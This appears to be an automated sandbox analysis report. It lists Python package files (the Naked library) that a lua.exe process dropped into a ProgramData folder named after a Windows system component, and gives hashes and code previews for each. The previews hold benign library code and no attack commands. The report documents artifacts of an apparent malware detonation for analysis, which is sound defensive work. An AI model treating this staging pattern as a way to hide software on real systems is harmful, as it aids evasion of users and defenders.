C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\commands\locate.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1449
Entropy (8bit):	4.718835666484145
Encrypted:	false
SSDEEP:	24:8caAXiZ3mLja3IjYsjf6R66AVEsRiIEKTF+aG:8jQiJROp6A3ipKTgaG
MD5:	5F84E12F1192CDC634F535F18C92CE9A
SHA1:	38F3D4DD0DCEB6CA6A5DE3356957F5F395F38AE6
SHA-256:	F7067F45208D8EED6158692B5060CE4A55933E0E9C6C0E3F70A26E00A5B8B31B
SHA-512:	3C8E4250770591CD60EBFF67F581072188626A7981168E37EE36562C10AAB4085193FD80A0DEC34071C2076633D6EB535E142AF2C5E5FDBD33CC6BE84F4DE69B
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import os.from Naked.toolshed.system import stderr, exit_success..class Locator:. def __init__(self, needle):. self.needle = needle. self.location = self._display_location().. def _display_location(self):. if self.needle == 'main':. main_path = os.path.join('<PROJECT>', 'lib', '<PROJECT>', 'app.py'). print("app.py : " + main_path). exit_success(). elif self.needle == "settings":. settings_path = os.path.join('<PROJECT>', 'lib', '<PROJECT>','settings.py'). print("settings.py : " + settings_path). exit_success(). elif self.needle == "setup":. setup_path = os.path.join('<PROJECT>', 'setup.py'). print("setup.py : " + setup_path). exit_success(). else:. stderr("Unable to process the command. Use 'naked locate help' for more information.", 1)..def help():. help_string = """.Naked locate Comma

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\commands\make.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	18788
Entropy (8bit):	4.509751625669207
Encrypted:	false
SSDEEP:	384:bT53ysXBcjMB7jg+po3/h7j3+02ZD+y1FHL5jpeftx6Mn5wtBX5vNskGNbNGNu//:b027nHDMFA6r
MD5:	61362E8888DF0939BBCD64305756D106
SHA1:	C2F4D12AB25795FC7F61590ECBE13C1EFBE6714C
SHA-256:	8A46CC8F74F6E0B13105AC60778EB90C134D7A6A996FCCBA4471E72894EC4056
SHA-512:	629E9680E7E215E21999D57F152D729C2B149B7666A1E8B5550ADD68485F6FBCCC99F5E9A67FB000AB3ACF8F270843E46E437524E31EF9D1D8B964008007040C
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import Naked.toolshed.system as system.import Naked.toolshed.python as python.import Naked.toolshed.file as nfile.import Naked.toolshed.ink as ink.from Naked.toolshed.types import XDict, XString.from Naked.toolshed.system import make_dirs, make_path, exit_success.import datetime.import sys..## TODO: Check for a local settings file (appname.yaml).## TODO: make directories and files.#------------------------------------------------------------------------------.# [ MakeController class ].# Top level logic for the make command.#------------------------------------------------------------------------------.class MakeController:. def __init__(self, app_name):. self.app_name = app_name.. def run(self):. if self.app_name == None:. i = InfoCompiler(None). data_container = i.getSetupFileInfo(). else:. i = InfoCompiler(self.app_name). data_container = i.getUserInfo().. db = Di

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\commands\profile.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1700
Entropy (8bit):	4.495863799346637
Encrypted:	false
SSDEEP:	24:8cwnAe+ni2pN/gni2w0UScQ6VvMv6ZZE7Sf7cVBU7csRGmXztBlFcRPcpO47k6wu:8/Wyw0TEoKc0pGCjYwktGjb
MD5:	170387B8F9BACB4250595CA046608E7D
SHA1:	D610FB549AC90CE62F8DE39523A89E5196F2E8AD
SHA-256:	473FEB5B076A5F2E96AD6ACF683081AEC541C2926BC110ABB271EDAA3F8B999D
SHA-512:	3F546FA9D0B6D9A3F94D0F41F86A9D82DCFFFD6710B29C0A44F7B0AFD00E47BA4D8F8C34D09E8813F5838E18C6D453A52412F1CA215F843B5DE57A42210CA4CF
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import os.from Naked.toolshed.system import file_exists, dir_exists, stderr, exit_success..class Profiler:. def __init__(self, dir_levels = 6):. self.number_of_dir_levels = dir_levels # number of directory levels to bottom to top search.. def run(self):. lib_found = False. for i in range(self.number_of_dir_levels):. if not self._is_lib_at_this_level():. os.chdir(os.pardir). else:. lib_found = True. break. if lib_found:. os.chdir('lib') # chdir to the lib directory if it is found. if file_exists('profiler.py'): # confirm that profiler.py exists. os.system('python profiler.py') # run the profiler.py file. exit_success(). else:. stderr("Unable to locate a profiler.py file in your lib directory.", 1). else:. stderr("Unable to locate your profiler.py file.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\commands\pyh.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1071
Entropy (8bit):	4.824957031341611
Encrypted:	false
SSDEEP:	24:8c3o00lBkImEObPAWHr30H31pUHYbF3sKgA3797Mk7YL87+aG:8S70bkIzObPxb83gHYbF3V797r7laaG
MD5:	1ACC99ADCB504F27C3AE8A93D0DEC01F
SHA1:	451275BBC445400F7079CE65E6371E59C5FD1484
SHA-256:	06A7E8E75DC82B03C1D3163862FB5449DBE94887AD13DB56FA07D31B656832A6
SHA-512:	9A0B8BE502F42C29967327161301104DAFC3A00FC51193B2D236FF81AAFFE2DDE6BD35A7DEF38350464CDBC4634BC365BF0ED20A0E48B3EDFABDC1DDAD2D9B23
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import sys..def python_help(help_string):. try:. needle = help_string. if needle.startswith("'") and needle.endswith("'"):. needle = needle[1:-1]. elif needle.startswith('"') and needle.endswith('"'):. needle = needle[1:-1]. help(needle). except Exception as e:. print(e). sys.stderr.write(".naked. There was an error processing the query."). sys.exit(1)..def pyh_help():. from Naked.toolshed.system import exit_success. help_string = """.Naked pyh Command Help.======================.The pyh command searches the built-in Python documentation for a query term. The query term can be a Python built-in module, class/type, method, or function...USAGE. naked pyh <query>..SECONDARY COMMANDS. none..OPTIONS. none..EXAMPLES. Module Docs: naked pyh sys.. Class Docs: naked pyh dict.. Method Docs: naked pyh dict.update.. Function Docs: naked pyh max""".. prin

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\commands\test.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6720
Entropy (8bit):	4.314028175800067
Encrypted:	false
SSDEEP:	96:8PM+Y8qi0NP6tG/DJ8isdIoti75GHO73i72aZ+IXsGVuIAuwpSB+G3g5hjb8jOjX:fKIV8xKogoR2FsMGpOjX
MD5:	D77064A8C38F3F7E015B1BA8D4414EA9
SHA1:	D04BC42A26C2DFFAAFCF5137C2875FED102891CC
SHA-256:	F93FDC5E66D2E41A0BEF02AE0BA5714345BCF90F9D71197AE1F559B22123EF98
SHA-512:	EA30E68470E30A1C6927FDBF2C0CC81B5162E34C874565B1B7AB2E09851BBEEF852F9D27AA34B662C01A41DB7E242E8EF49094AFA282AB04DD15D18D44C5094A
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import os.from Naked.toolshed.system import cwd, file_exists, dir_exists, stderr, exit_success..#------------------------------------------------------------------------------.# [ ToxTester class ].# Run Tox on the project directory, by default runs all python versions in tox.ini.# Optional specify the version of Python to test in constructor (runs 'tox -e py<version>').# Optional specify the number of directory levels `dir_levels` to search bottom to top (default = 4).#------------------------------------------------------------------------------.class ToxTester:. def __init__(self, py_version="", dir_levels = 6):. self.py_version = py_version. self.number_of_dir_levels = dir_levels.. def run(self):. tox_found = False. for i in range(self.number_of_dir_levels):. if not self._is_tox_ini_at_this_level():. os.chdir(os.pardir). else:. tox_found = True.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\commands\usage.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.549486551401497
Encrypted:	false
SSDEEP:	6:HWaHUclqRLYzTRArleyAvek1AKF3XFkYf2lqvCRWPFqrThch3sAjajK:HcchzTytQ1A0+lPRWoB2aG
MD5:	A452B3CAD6117E8C14A0D675B2FBD915
SHA1:	54BE083D980F912C7C4CF17C32F9E7DFB37A9785
SHA-256:	012A791A474F1C477D373FEB60D7E3A2323429798732199BB3B92DB5EE8B79C6
SHA-512:	63B9889CF8F7F44A7807B3D49C409A24EF3B61158ECB5723E73A07810FA0C5306443F9C1DB29118B38D8B81EBFD22EDD3B31C8554FE3E2AE6D1B54DFFC85002C
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import Naked.settings.from Naked.toolshed.system import exit_success..class Usage:. def __init__(self):. self.usage = Naked.settings.usage.. def print_usage(self):. print(self.usage). exit_success()...if __name__ == '__main__':. pass.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\commands\version.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	789
Entropy (8bit):	4.484823643807236
Encrypted:	false
SSDEEP:	24:8cVTaxA/HoGa9E3dnHvfDt3nAfmt3nnuOaG:8OuxO5g2dnHpn0wnPaG
MD5:	20D69752CEAAB7B5254EB0036386F4CC
SHA1:	0470FF9EC34600C27D7926895F1F370B0B8E05FC
SHA-256:	9123EBAF86E585B4D24F548D5042A79C3F54ACFF545BBB3D7A1A2CFAA88CE5AB
SHA-512:	AE40B6B9627977B7569F4790DA12BBB754990ACDDC647810D42E6BCC87D6BA527458255C7F4AEF6001F25009FDB4EA9D661173DB211A655502FF67D4584DEEA2
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import Naked.settings.from Naked.toolshed.system import exit_success..class Version:. def __init__(self):. self.major_version = Naked.settings.major_version. self.minor_version = Naked.settings.minor_version. self.patch_version = Naked.settings.patch_version. self.name = Naked.settings.app_name. self.app_version_string = self.name + " " + self.major_version + "." + self.minor_version + "." + self.patch_version. self.version_string = self.major_version + "." + self.minor_version + "." + self.patch_version.. def print_version(self):. print(self.app_version_string). exit_success().. def get_version(self):. return self.version_string...if __name__ == '__main__':. pass.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\scratchpad.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	743
Entropy (8bit):	4.914970974760017
Encrypted:	false
SSDEEP:	12:Hcc969sQziz4pKLKtqRLM7rHb6cd6tzYK3dokz6yF8Iu5rje+T2aO4B7u:8cksKPpAykLMfJ61okz6yF25rjOaDS
MD5:	481A16B0ECE6FE86E8FA344CCD837070
SHA1:	E6D8DB3CAC95CC6252F620469BCF234164E27B7C
SHA-256:	349E8D610AE6CD51C31CE11A8057000AE4A9D02D858B22A11F0A596F3ED59171
SHA-512:	BD5A18FB162A47C3D0C7FB49ED4D0E221B1B535EE7DA50488CA4362ADDE01417EBE5AE3AE043BD8E07D867528E0EA19DE00E61F54C8E0A27D38FA1C8F5F78D3B
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..# import sys.# from functools import wraps.# from Naked.toolshed.types import XMaxHeap, XMinHeap..# def print_scratch(func):.# @wraps(func).# def print_wrapper(args, kwargs):.# print(func(args, **kwargs)).# return print_wrapper...# def run_scratchpad():.# # from Naked.toolshed.file import FileReader.# # from Naked.toolshed.types import XString, XUnicode..# # r = FileReader('/Users/ces/Desktop/code/naked/tests/testfiles/unicode.txt').# # test1 = r.read_utf8().# # test2 = XUnicode(test1, {'a': 'b'}).# # test3 = "Hey! It's Bengali . .,and here is some more .".# # print(unicode(test2))....# if __name__ == '__main__':.# run_scratchpad().

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\settings.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2976
Entropy (8bit):	4.218370346202258
Encrypted:	false
SSDEEP:	48:873gAo00cd2DHhYI9LcR3gNuOymxAoNLDHGE4HgYeFwCp5GDH7EcX:873gA/uFYI9LcR3gNyFoNLSE8gtFwV7b
MD5:	978F83FBEE1DCFE9AD723139392E6DD5
SHA1:	5D057D70A1F75AF8D74DDD67D909C87CA893C19E
SHA-256:	B97B83FD0A526DA38BDFB37EA7FE2993516CADBFEE429225DF0920EAE4D1F02C
SHA-512:	2D15B42CAFE74A140DA5EF4224AE4A14D79C434ABE9E0E7A4A5177506BB1C372BB0C75F914C013254F07078E232886AFCC61BF03B0DE5D0C729910EAC24A087A
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..#------------------------------------------------------------------------------.# Application Name.#------------------------------------------------------------------------------.app_name = "naked"..#------------------------------------------------------------------------------.# Version Number.#------------------------------------------------------------------------------.major_version = "0".minor_version = "1".patch_version = "31"..#------------------------------------------------------------------------------.# Debug Flag (switch to False for production release code).#------------------------------------------------------------------------------.debug = False..#------------------------------------------------------------------------------.# Usage String.#------------------------------------------------------------------------------.usage = """.Usage: naked <primary command> [secondary command] [option(s)] [argument(s)].--- Use 'naked help' fo

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\templates\app_file.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5188
Entropy (8bit):	4.263477784927043
Encrypted:	false
SSDEEP:	96:8300MEYBXCmnq7kRY+hwFrPcJEq8Wjrn/UAzWA5ogrRlrLTc:oJdP7+PJEqdXcAzWA3Tc
MD5:	6B45D6B0795F77EF641B13391FDE2F26
SHA1:	BD2117AA5D255EBBA33DE582BE1EC42478A40330
SHA-256:	03CEF8162ED305F5F63BCB8C11C62F35BA54BDCD790BEAEB15B4FD30B58E2F44
SHA-512:	B34391FB3D34CF7573B08A8E3EA95B086FC9BA188E0E0FF46FAC4D8CCC1C577C867BC7A3F89328621B90CB7ACFF3DA23DDD37D97B35D310FBB279B953178023D
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..# VARS = app_name, developer, license_name, year.app_file_string = """.#!/usr/bin/env python.# encoding: utf-8..#------------------------------------------------------------------------------.# {{app_name}}.# Copyright {{year}} {{developer}}.# {{license}}.#------------------------------------------------------------------------------..#------------------------------------------------------------------------------------.# c.cmd = Primary command ({{app_name}} <primary command>).# c.cmd2 = Secondary command ({{app_name}} <primary command> <secondary command>).#.# c.arg_to_cmd = first positional argument to the primary command.# c.arg_to_cmd2 = first positional argument to the secondary command.#.# c.option(option_string, [bool argument_required]) = test for option with optional positional argument to option test.# c.option_with_arg(option_string) = test for option and mandatory positional argument to option.# c.flag(flag_string) = test for presenc

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\templates\licenses.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6052
Entropy (8bit):	5.0453326470843605
Encrypted:	false
SSDEEP:	96:854M3HFKMOrXqJ0uJz3F3U3zxFyTuC73sugckuJQHAuLe:UR3HpOrXq0ebF3U3FKuC73sugcQHne
MD5:	2C7AABB87924755CBC176447BFD30FCF
SHA1:	97ABEB802C24C6A29928FCBD261860EE9F381243
SHA-256:	585DA616CBFCA07FF151D109318D7BA16C668E64A139A81805045D191788C711
SHA-512:	A1F7EF51284703A1331900D419F37EC1608A9F2A9450A4B2E23B082D1D29F356B420C094DB60A67BB3287DF6AFAFAEB217B1D24FF6D5D5E09CCC7678B3BD9048
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..# ALL LICENSES: VARS = year, developer..#------------------------------------------------------------------------------.# [ apache_license ].# The Apache License.#------------------------------------------------------------------------------.apache_license = """.Copyright {{year}} {{developer}}..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License.."""..#------------------------------------------------------------------------------.# [ bsd_license ].# The BSD 2-clause license.#------

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\templates\manifest_in_file.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	109
Entropy (8bit):	4.751315954923671
Encrypted:	false
SSDEEP:	3:TKQWaHMPAtgDKCtQlqeM2/ILV3LKR6DM8QP9hMT+yf7cPPn:HWaHUclqeM+2Y6SdayPn
MD5:	4D662FCF16858675BBEA7B462FF262EB
SHA1:	6AB1C569349A22BB1B743D9417E94299F9C4EB95
SHA-256:	F45906ED91DD69D8AC13E521EEA748EBD1E7FA17C0093A3B208F0B1B6DDB1816
SHA-512:	9C5588B397CB8EB97F1D7EA7E222749B453D9B881A4BB442BB0475F4B898F389665F2B91B4C2EE53706AA170A5965A1F9ADD63C0B11ED62FC830C4B7FB63EA06
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..# VARS = --none--.manifest_file_string = "recursive-include docs *".

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\templates\profiler_file.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1530
Entropy (8bit):	3.231062056152632
Encrypted:	false
SSDEEP:	24:8clYO1acjvenwxcaV26X0SWSU4oAiSTPamGgOKaOeH:8nkOaQM0GUDAjN/af
MD5:	339B7AB8528E0699DA44AC58966C1866
SHA1:	89FCCBB9E4CE658910D9C5A0453A4A8FBB1DC7D6
SHA-256:	5D2C42E27067836EA3ECD9A698E5C7CF6C19E3BD361690069ED68D790F1618BC
SHA-512:	6B3685E00786471032BFB010F9224C5355B7C03AD16DF1478FEE3A3D76D06F45972EF8701B9382F0B9F5A58DE290665F71CD1C583944212AA3D5CC760A162E08
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..# VARS = --none--.profiler_file_string = """.#!/usr/bin/env python.# encoding: utf-8..import cProfile, pstats, StringIO..def profile():. #------------------------------------------------------------------------------. # Setup a profile. #------------------------------------------------------------------------------. pr = cProfile.Profile(). #------------------------------------------------------------------------------. # Enter setup code below. #------------------------------------------------------------------------------. # Optional: include setup code here... #------------------------------------------------------------------------------. # Start profiler. #------------------------------------------------------------------------------. pr.enable().. #------------------------------------------------------------------------------. # BEGIN profiled code block. #-----------------------------------

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\templates\pypush_file.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	586
Entropy (8bit):	4.907918060619471
Encrypted:	false
SSDEEP:	12:Hcc9MqB74sIZAkg7EzEstyhv6UZQXs6A6v5rbX4XshWA6v5+dQ3v:8cQRZAqzjU6Xsu5bIXshCgdq
MD5:	1E7442FF2EB554967C7F490150D00B46
SHA1:	6998A3E9421C3DBAB2598589932E8EA55B8E7A66
SHA-256:	4549DD8331F8CBD2E162091AD684EF541FFFC9FBD7772B0D74AEEA3B3C0E3721
SHA-512:	8266AAA2D5457DE90C763EF8281C9BC73A7CF582A29CE1963957AFC4312DD0837703F2F333FF7F2295774BC8F9F80BDC53B7DFD9B412F1256B78D0A7D113AECB
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..# VARS = year.pypush_file_string = """.#!/bin/sh.# Scriptacular - pypush.sh.# Create a Python source distribution and push it to PyPI.# Copyright {{year}} Christopher Simpkins.# MIT License...# Build and push to PyPI.python setup.py sdist upload..# Confirm that it worked.if (( $? )); then. echo "Unable to distribute your release to PyPI" >&2. exit 1.fi..python setup.py bdist_wheel upload..# Confirm that wheel distribution worked.if (( $? )); then. echo "Unable to distribute your wheel to PyPI" >&2. exit 1.fi..# Exit success.exit 0.""".

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\templates\readme_md_file.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.816503031321493
Encrypted:	false
SSDEEP:	3:TKQWaHMPAtgDKCtQlqeM2aNlMZLP9vVw9SH:HWaHUclqeM1eVta0H
MD5:	52D9AEE0618A96E1F1D0B4D06FCB44D7
SHA1:	49864CF598841AC64739C2FA3D5A4E24B9419EAF
SHA-256:	9E31121D6BB0E61782D848D17BC9BB0606355AFDA05CC5129DFD128D72CBA41E
SHA-512:	BD6E658111E5E25653B2A5D73CB60A8575B82DEC10F82713116FA5CC09588F7A52804F0ED45ADB1607C742DF883CAE30DD89841B3325727C2A4DC19E35F8E1B8
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..# VARS: app_name.readme_md_string = """.{{app_name}}.=====.""".

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\templates\settings_file.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1179
Entropy (8bit):	2.5644646055655107
Encrypted:	false
SSDEEP:	12:Hcc9MyQvdEpc9ox/22fsYuzAo0mAXALeOWeLsujlcLLifYeHIb4v:8cSdacSxbUTzAo03EeojlkifYeHI8v
MD5:	3F6B17925EDA504E8330A0DB797FEB2A
SHA1:	03CD5DB3DC58FA2C62306CAF4BC63CA6BA2F6302
SHA-256:	6E409F404FEAA7EB5D5C2C0174823FE08A9A3B65395C953287E42F4F2A4E5B5B
SHA-512:	1315488A3E581D9FA2662E0D152ABFA8350C5089C97A696CC2B58FE59BFC1AD839E29DA98F3F285E5ADAF66EBC1D7EDE79798E33B940B8720AE45E20DFFF6A70
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..# VARS = app_name.settings_file_string = """.#!/usr/bin/env python.# encoding: utf-8..#------------------------------------------------------------------------------.# Application Name.#------------------------------------------------------------------------------.app_name = '{{app_name}}'..#------------------------------------------------------------------------------.# Version Number.#------------------------------------------------------------------------------.major_version = "0".minor_version = "1".patch_version = "0"..#------------------------------------------------------------------------------.# Debug Flag (switch to False for production release code).#------------------------------------------------------------------------------.debug = True..#------------------------------------------------------------------------------.# Usage String.#------------------------------------------------------------------------------.usage = ''..#--------

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\templates\setup_cfg_file.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	107
Entropy (8bit):	4.857317570794172
Encrypted:	false
SSDEEP:	3:TKQWaHMPAtgDKCtQlqeM2FAxC6Qc9v/0veSEJFhP:HWaHUclqeMJC6Qct/02Sg7
MD5:	A27CE4C338BAA05CA187411176FE32B8
SHA1:	C0F84F1E2C1616C9060A9404D6FE32B2EEA41AA1
SHA-256:	065F809284167B602D875DCBEBC27AA67CD53F2CF41519ABEEF08A21DC9E0245
SHA-512:	9641C00F0A939E45E546EE9611AE0C13501838A3D6B3D38264B556121FCBB7692F3AB9A58071AC5679A5B6845546A2C3FD6761C87C07D8957E40F73D6B7FEA3B
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..# VARS: --none--.setup_cfg_string = """.[wheel].universal = 1.""".

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\templates\setup_py_file.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1769
Entropy (8bit):	4.896614138064879
Encrypted:	false
SSDEEP:	48:8j1byhNR9VYs9/NUQ9ilgDVs6PxnLy5/fJksJz7O:8xyPhuGDmShgnJO
MD5:	92161397274AFDC4B74826A1228036B9
SHA1:	D64E815EB92ECE4B149C480909EEBC9D6D44FAFC
SHA-256:	6767341690D32A744FDADC4907B7D2084903D7B0A7C9380814E2C246547F920B
SHA-512:	3034564E53A311A40803A82CE263501E9E8282371F125F03583AD5A06575971230E253B497227A73772F764209CB86B008A1426ED7867099EFFD6F080A5B9769
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..# VARS: app_name, developer, license.setup_py_string = (""".import os.import re.from setuptools import setup, find_packages...def docs_read(fname):. return open(os.path.join(os.path.dirname(__file__), 'docs', fname)).read()..def version_read():. settings_file = open(os.path.join(os.path.dirname(__file__), 'lib', '{{app_name}}', 'settings.py')).read(). major_regex = """ + '"""' + """major_version\s?=\s?["']{1}(\d+)["']{1}""" + '"""' + '\n ' +. 'minor_regex = ' + '"""' + """minor_version\s?=\s?["']{1}(\d+)["']{1}""" + '"""' + '\n ' +. 'patch_regex = ' + '"""' + """patch_version\s?=\s?["']{1}(\d+)["']{1}""" + '"""' + '\n ' +. """major_match = re.search(major_regex, settings_file). minor_match = re.search(minor_regex, settings_file). patch_match = re.search(patch_regex, settings_file). major_version = major_match.group(1). minor_version = minor_match.group(1). patch_version = patch_match.group(1). i

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\benchmarking.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	17235
Entropy (8bit):	4.329409338934104
Encrypted:	false
SSDEEP:	192:DTtEammamhamVEambEamXEamMLFXILH7PeowKtVooQItacksMSm7eowKtVooQItU:Dh7A24Eg5jH3
MD5:	8F78D335369F821A95789D02D6CE0B0F
SHA1:	5741F067066AACC35C4623C41350F3CFEB898E3B
SHA-256:	0E7E445E647FC2202D1BE9AA5A6045409FE2EF8F7FFA1675F8FC440704AC0304
SHA-512:	D0B67BC6D72382FAB9117856DC2A59DB6F4340BB9B93D43B2F4969CD4C47DD99BDECDFA48501173BE3963971143515760DF02143B05D5A8C08B58F0302FA13BD
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import sys.import time.import gc.from functools import wraps..#------------------------------------------------------------------------------.# [ timer function decorator ].# runs timed repetitions of the decorated function in a single trial.# default is 100,000 repetitions in the trial.# reports the results of the trial.# Usage example:.# from Naked.toolshed.benchmarking import timer.# @timer.# def myfunction():.#------------------------------------------------------------------------------.def timer(func, repetitions=100000):. @wraps(func). def wrapper(args, kwargs):. sys.stdout.write("Starting " + str(repetitions) + " repetitions of " + func.__name__ + "()..."). sys.stdout.flush(). print(" "). # disable garbage collection. gc.collect(). gc.disable(). start = time.time(). for x in range(repetitions):. result = func(args, **kwargs). end = t

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\benchmarking.c Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	880286
Entropy (8bit):	5.100683969209631
Encrypted:	false
SSDEEP:	12288:9RxIp9D+D7f5FjNNS7VR6X5HQTy6trz/0oLkFpD7VmDT1NP2LGTlTN6j6rvcw3K8:e
MD5:	353868F6BC3FC6259EB8998EE9B8E744
SHA1:	C2CC16BDD49FBDEF932BD49B97F4E8076DEA79E3
SHA-256:	50360CCA8DDE68C401D1C736F007E4C9E3D42C442EBEDA9A15E6562BD0E0CCB3
SHA-512:	507669DDFF584129370BF28FF18BDA50070A6BEE454711F9F31C07244BE9CA36AAF0E86C128E4B9156951C69EEB560547B1C1341CF0FA1128E3D465C2BB01C64
Malicious:	false
Preview:	/* Generated by Cython 0.20.1 on Sun Mar 16 22:58:12 2014 /..#define PY_SSIZE_T_CLEAN.#ifndef CYTHON_USE_PYLONG_INTERNALS.#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 0.#else.#include "pyconfig.h".#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 1.#else.#define CYTHON_USE_PYLONG_INTERNALS 0.#endif.#endif.#endif.#include "Python.h".#ifndef Py_PYTHON_H. #error Python headers needed to compile C extensions, please install development version of Python..#elif PY_VERSION_HEX < 0x02040000. #error Cython requires Python 2.4+..#else.#define CYTHON_ABI "0_20_1".#include <stddef.h> / For offsetof /.#ifndef offsetof.#define offsetof(type, member) ( (size_t) & ((type)0) -> member ).#endif.#if !defined(WIN32) && !defined(MS_WINDOWS). #ifndef __stdcall. #define __stdcall. #endif. #ifndef __cdecl. #define __cdecl. #endif. #ifndef __fastcall. #define __fastcall. #endif.#endif.#ifndef DL_IMPORT. #define DL_IMPORT(t) t.#endif.#ifndef DL_EXPORT.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\benchmarking.pyx Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	17235
Entropy (8bit):	4.329409338934104
Encrypted:	false
SSDEEP:	192:DTtEammamhamVEambEamXEamMLFXILH7PeowKtVooQItacksMSm7eowKtVooQItU:Dh7A24Eg5jH3
MD5:	8F78D335369F821A95789D02D6CE0B0F
SHA1:	5741F067066AACC35C4623C41350F3CFEB898E3B
SHA-256:	0E7E445E647FC2202D1BE9AA5A6045409FE2EF8F7FFA1675F8FC440704AC0304
SHA-512:	D0B67BC6D72382FAB9117856DC2A59DB6F4340BB9B93D43B2F4969CD4C47DD99BDECDFA48501173BE3963971143515760DF02143B05D5A8C08B58F0302FA13BD
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import sys.import time.import gc.from functools import wraps..#------------------------------------------------------------------------------.# [ timer function decorator ].# runs timed repetitions of the decorated function in a single trial.# default is 100,000 repetitions in the trial.# reports the results of the trial.# Usage example:.# from Naked.toolshed.benchmarking import timer.# @timer.# def myfunction():.#------------------------------------------------------------------------------.def timer(func, repetitions=100000):. @wraps(func). def wrapper(args, kwargs):. sys.stdout.write("Starting " + str(repetitions) + " repetitions of " + func.__name__ + "()..."). sys.stdout.flush(). print(" "). # disable garbage collection. gc.collect(). gc.disable(). start = time.time(). for x in range(repetitions):. result = func(args, **kwargs). end = t

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\build.sh Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	36
Entropy (8bit):	4.218128820706467
Encrypted:	false
SSDEEP:	3:G7LkxHv:oKP
